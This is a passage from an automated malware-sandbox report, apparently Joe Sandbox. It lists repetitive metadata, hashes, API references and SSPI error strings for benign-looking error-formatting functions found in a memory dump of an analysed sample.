SEC_E_TIME_SKEW, xrefs: 00007FF7F1DAEECD
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_TIME_SKEW
API String ID: 1435330505-867874831
Opcode ID: 1f780b60aa17603c72ab156b6d8a4f3fa771a5bd6edad29dfdc1b6db3d32cf72
Instruction ID: c39a2165a9bf9f1bfe04f4d0736f627954393dadb1727fad396cb65078deb4ae
Opcode Fuzzy Hash: 1f780b60aa17603c72ab156b6d8a4f3fa771a5bd6edad29dfdc1b6db3d32cf72
Instruction Fuzzy Hash: F9116022618A4285E768FF10A0402EDA375FF88741FC14036D99E027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEE9D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_SMARTCARD_CERT_REVOKED, xrefs: 00007FF7F1DAEE9D
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_SMARTCARD_CERT_REVOKED
API String ID: 1435330505-2367886648
Opcode ID: a9814ed6d2a1dd476941d2b209b762dd06d41defb7f0ac291e2fe5d3431fa7e8
Instruction ID: a75d731d8ca424add0b93c412c8cfdb48a3aaa27a214e7fae5a83e61ff322562
Opcode Fuzzy Hash: a9814ed6d2a1dd476941d2b209b762dd06d41defb7f0ac291e2fe5d3431fa7e8
Instruction Fuzzy Hash: E2116D22618A4285E7A8FF10A0442EDA375FF88781FC14036E9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEEB5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_STRONG_CRYPTO_NOT_SUPPORTED, xrefs: 00007FF7F1DAEEB5
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_STRONG_CRYPTO_NOT_SUPPORTED
API String ID: 1435330505-2827815589
Opcode ID: 9af50a84a6f40274547f9d62730669a6767f419a28bde4b4ae7fdae931e82395
Instruction ID: cffda26b10fffcb2c20696fd783d5698682311f600069d0f5302135ef472528f
Opcode Fuzzy Hash: 9af50a84a6f40274547f9d62730669a6767f419a28bde4b4ae7fdae931e82395
Instruction Fuzzy Hash: 9A116D22618A4285E7A9FF10A0402FDA375FF88781FC14036E9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEEA9 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C
SEC_E_SMARTCARD_LOGON_REQUIRED, xrefs: 00007FF7F1DAEEA9

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_SMARTCARD_LOGON_REQUIRED
API String ID: 1435330505-530148132
Opcode ID: 7bb6e5011ad3637598d584074ccbcc182e02cf6b03d54b887a35a6aabdaea5f8
Instruction ID: f8acc8f4a383e8058d37a60d9b570a7b2bd9a6c1b5b5a05b81942ddd262de9f6
Opcode Fuzzy Hash: 7bb6e5011ad3637598d584074ccbcc182e02cf6b03d54b887a35a6aabdaea5f8
Instruction Fuzzy Hash: 69116D22618A4285E7A8FF10A0442EDA375FF88781FC14036E9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEE85 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_SHUTDOWN_IN_PROGRESS, xrefs: 00007FF7F1DAEE85
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_SHUTDOWN_IN_PROGRESS
API String ID: 1435330505-1032945330
Opcode ID: db9b025f20f5e3e95b701f7726f4fe184dcb8ec2068971865a8eeaa487dc1b52
Instruction ID: a7ea933de123ab74b09e0036c5ec94d55c070e7e39ab65dd9ce2608b0dc20af2
Opcode Fuzzy Hash: db9b025f20f5e3e95b701f7726f4fe184dcb8ec2068971865a8eeaa487dc1b52
Instruction Fuzzy Hash: 0B118222618A4286E768FF10A0402FDA375FF88741FC14036D99E027D6DFBCD445C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEE79 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C
SEC_E_SECURITY_QOS_FAILED, xrefs: 00007FF7F1DAEE79

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_SECURITY_QOS_FAILED
API String ID: 1435330505-538001202
Opcode ID: c5142b3c6c68b094214a02388c670e5535dc34376c361a479a40382bec39f358
Instruction ID: 47247ea32930ed2a52762b410fab2ac604ac39280a9640b99bca487fcb9b0886
Opcode Fuzzy Hash: c5142b3c6c68b094214a02388c670e5535dc34376c361a479a40382bec39f358
Instruction Fuzzy Hash: 42118222618A4285E768FF10A0402FDA375FF88741FC14036D99E027D6DFBCD445C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEE91 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

%s - %s, xrefs: 00007FF7F1DAF059
SEC_E_SMARTCARD_CERT_EXPIRED, xrefs: 00007FF7F1DAEE91
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_SMARTCARD_CERT_EXPIRED
API String ID: 1435330505-701404350
Opcode ID: 14c84530406cea2f6ad1a96f663cbcf1d189fe7144d7c026bdadac13e44c029f
Instruction ID: 01cd610f9fdfc9cd91b6d8573efac072b9de13d6e2efba7c6e86347680a7d6cb
Opcode Fuzzy Hash: 14c84530406cea2f6ad1a96f663cbcf1d189fe7144d7c026bdadac13e44c029f
Instruction Fuzzy Hash: FD116D22618A4285E7A8FF10A0402EDA375FF88781FC14036E9AE027D6DFFCD845C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEE61 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_REVOCATION_OFFLINE_KDC, xrefs: 00007FF7F1DAEE61
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_REVOCATION_OFFLINE_KDC
API String ID: 1435330505-3944752561
Opcode ID: 09f116397d411045982a1763bc6adbf8633d6df6abdf7de52d1063983dab2ae7
Instruction ID: 0ecb20e2b55bd0958e9165852b35994dec7f47530f4d0bc5d65d48a76555c13f
Opcode Fuzzy Hash: 09f116397d411045982a1763bc6adbf8633d6df6abdf7de52d1063983dab2ae7
Instruction Fuzzy Hash: 55118222618A4285E768FF10A0402FDA375FF88741FC14036D99E027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEE6D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_SECPKG_NOT_FOUND, xrefs: 00007FF7F1DAEE6D
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_SECPKG_NOT_FOUND
API String ID: 1435330505-2788034027
Opcode ID: e4f15aedf80c7c131c9545047d0943edaa8e4f7cc9274c87a88210dcde743aee
Instruction ID: cc381dcab06026362cfa6a8b07e1cd8a45ea5d8071c8e501ee4adf22d6245aa9
Opcode Fuzzy Hash: e4f15aedf80c7c131c9545047d0943edaa8e4f7cc9274c87a88210dcde743aee
Instruction Fuzzy Hash: 89116022618A4285E7A8FF10A0402EDA375FF88741FC14036D99E027D6DFBCD445C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEE3D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_POLICY_NLTM_ONLY, xrefs: 00007FF7F1DAEE3D
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_POLICY_NLTM_ONLY
API String ID: 1435330505-2604752562
Opcode ID: 79b381ddf5f17da8cfd930ab5201a775a187c5eb0d25baf50fd767419ce7d404
Instruction ID: af02a6524330fd2542ce5e92d0d2f2bc14c8851ff9e92f091119d5bf813136a5
Opcode Fuzzy Hash: 79b381ddf5f17da8cfd930ab5201a775a187c5eb0d25baf50fd767419ce7d404
Instruction Fuzzy Hash: 21118222618A4286E768FF10A0402FDA375FF88781FC14036D99E027D6DFBCD445C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEE55 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C
SEC_E_REVOCATION_OFFLINE_C, xrefs: 00007FF7F1DAEE55

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_REVOCATION_OFFLINE_C
API String ID: 1435330505-3434868068
Opcode ID: 417c1251e3616ffe4df876f11a2543a97fb2ccc6a709b5a35591957fbf67e140
Instruction ID: 6349dfd4431f52930eefd44df78af85970f30c312a9e9b0d5ae93830ab11ac3f
Opcode Fuzzy Hash: 417c1251e3616ffe4df876f11a2543a97fb2ccc6a709b5a35591957fbf67e140
Instruction Fuzzy Hash: 32118222618A4285E769FF10A0442FDA375FF88741FC14036D99E027D6DFBCD445C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEE49 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_QOP_NOT_SUPPORTED, xrefs: 00007FF7F1DAEE49
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_QOP_NOT_SUPPORTED
